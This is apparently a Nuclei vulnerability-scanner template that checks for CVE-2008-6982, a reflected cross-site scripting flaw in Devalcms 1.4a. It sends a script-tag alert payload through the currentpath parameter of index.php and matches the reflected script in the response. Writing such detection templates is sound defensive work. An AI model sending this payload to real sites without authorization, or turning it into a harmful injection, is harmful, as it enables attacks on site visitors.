id: CVE-2008-6982

info:
  name: Devalcms 1.4a - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
  reference:
    - https://www.exploit-db.com/exploits/6369
    - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
    - https://nvd.nist.gov/vuln/detail/CVE-2008-6982
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: "true"
  tags: devalcms,xss,cms,edb

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sub menu for: <script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 500

# Enhanced by md on 2022/09/20
